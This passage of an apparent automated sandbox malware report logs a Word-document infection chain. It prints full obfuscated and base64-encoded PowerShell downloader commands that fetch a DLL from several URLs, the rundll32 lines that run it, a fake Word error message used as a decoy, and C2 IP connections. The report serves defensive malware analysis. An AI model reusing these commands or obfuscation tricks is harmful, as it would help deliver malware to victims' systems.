,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,GetCurrentProcess,VirtualAllocExNuma,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,WriteFileGather,VirtualAlloc,SetLastError,MessageBoxA,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100099ED LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020166C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E166C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026F0 SetLastError,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A303 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 197.87.160.216 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 78.188.225.105 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 50.116.111.59 144
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
